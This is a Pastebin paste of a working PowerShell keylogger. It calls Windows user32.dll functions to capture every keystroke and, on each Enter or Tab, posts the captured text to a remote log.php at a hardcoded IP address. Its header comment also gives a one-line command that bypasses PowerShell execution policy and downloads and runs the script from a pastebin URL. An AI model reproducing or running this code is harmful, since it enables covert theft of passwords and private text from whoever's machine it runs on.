Advertisement
metalx1000

PowerShell to http post

Apr 27th, 2015
511
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <#
  2. Script based on PowerShell keystroke logger by shima
  3. http://vacmf.org/2013/01/23/powershell-keylogger/
  4.  
  5. http post on TAB/ENTER added by Kris Occhipinti http://filmsbykris.com
  6. powershell -executionpolicy bypass "IEX (New-Object Net.WebClient).DownloadString('http://pastebin.com/raw.php?i=Yje6cE3Y');"
  7.  
  8. #>
  9. function KeyLog {
  10.     $url = "http://192.168.20.158/metalx1000/log.php"
  11.     # MapVirtualKeyMapTypes
  12.     # <summary>
  13.     # uCode is a virtual-key code and is translated into a scan code.
  14.     # If it is a virtual-key code that does not distinguish between left- and
  15.     # right-hand keys, the left-hand scan code is returned.
  16.     # If there is no translation, the function returns 0.
  17.     # </summary>
  18.     $MAPVK_VK_TO_VSC = 0x00
  19.    
  20.     # <summary>
  21.     # uCode is a scan code and is translated into a virtual-key code that
  22.     # does not distinguish between left- and right-hand keys. If there is no
  23.     # translation, the function returns 0.
  24.     # </summary>
  25.     $MAPVK_VSC_TO_VK = 0x01
  26.    
  27.     # <summary>
  28.     # uCode is a virtual-key code and is translated into an unshifted
  29.     # character value in the low-order word of the return value. Dead keys (diacritics)
  30.     # are indicated by setting the top bit of the return value. If there is no
  31.     # translation, the function returns 0.
  32.     # </summary>
  33.     $MAPVK_VK_TO_CHAR = 0x02
  34.    
  35.     # <summary>
  36.     # Windows NT/2000/XP: uCode is a scan code and is translated into a
  37.     # virtual-key code that distinguishes between left- and right-hand keys. If
  38.     # there is no translation, the function returns 0.
  39.     # </summary>
  40.     $MAPVK_VSC_TO_VK_EX = 0x03
  41.    
  42.     # <summary>
  43.     # Not currently documented
  44.     # </summary>
  45.     $MAPVK_VK_TO_VSC_EX = 0x04
  46.    
  47.     $virtualkc_sig = @'
  48. [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
  49. public static extern short GetAsyncKeyState(int virtualKeyCode);
  50. '@
  51.  
  52.     $kbstate_sig = @'
  53. [DllImport("user32.dll", CharSet=CharSet.Auto)]
  54. public static extern int GetKeyboardState(byte[] keystate);
  55. '@
  56.  
  57.     $mapchar_sig = @'
  58. [DllImport("user32.dll", CharSet=CharSet.Auto)]
  59. public static extern int MapVirtualKey(uint uCode, int uMapType);
  60. '@
  61.  
  62.     $tounicode_sig = @'
  63. [DllImport("user32.dll", CharSet=CharSet.Auto)]
  64. public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
  65. '@
  66.  
  67.     $getKeyState = Add-Type -MemberDefinition $virtualkc_sig -name "Win32GetState" -namespace Win32Functions -passThru
  68.     $getKBState = Add-Type -MemberDefinition $kbstate_sig -name "Win32MyGetKeyboardState" -namespace Win32Functions -passThru
  69.     $getKey = Add-Type -MemberDefinition $mapchar_sig -name "Win32MyMapVirtualKey" -namespace Win32Functions -passThru
  70.     $getUnicode = Add-Type -MemberDefinition $tounicode_sig -name "Win32MyToUnicode" -namespace Win32Functions -passThru
  71.    
  72.     $log = ""
  73.     while ($true) {
  74.      Start-Sleep -Milliseconds 40
  75.      $gotit = ""
  76.      
  77.      for ($char = 1; $char -le 254; $char++) {
  78.          $vkey = $char
  79.          $gotit = $getKeyState::GetAsyncKeyState($vkey)
  80.          
  81.          if ($gotit -eq -32767) {
  82.  
  83.              $l_shift = $getKeyState::GetAsyncKeyState(160)
  84.              $r_shift = $getKeyState::GetAsyncKeyState(161)
  85.              $caps_lock = [console]::CapsLock
  86.              
  87.              $scancode = $getKey::MapVirtualKey($vkey, $MAPVK_VSC_TO_VK_EX)
  88.              
  89.              $kbstate = New-Object Byte[] 256
  90.              $checkkbstate = $getKBState::GetKeyboardState($kbstate)
  91.              
  92.              $mychar = New-Object -TypeName "System.Text.StringBuilder";
  93.              $unicode_res = $getUnicode::ToUnicode($vkey, $scancode, $kbstate, $mychar, $mychar.Capacity, 0)
  94.              
  95.              if ($unicode_res -gt 0){
  96.                  if (($vkey -eq 13) -or ($vkey -eq 9)) {
  97.                        
  98.  
  99.                         $fields=new-object System.Collections.Specialized.NameValueCollection
  100.                         $fields.Add("log",$log)
  101.                         $wc = new-object System.Net.WebClient
  102.                         $wc.UploadValues($url, $fields)
  103.                         $wc
  104.                                
  105.                      $log = ""
  106.                  }else{
  107.                      $log = "$($log)$($mychar.ToString())"
  108.                      echo $log
  109.                  }
  110.              }
  111.          }
  112.      }
  113.     }
  114. }
  115.  
  116. KeyLog
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement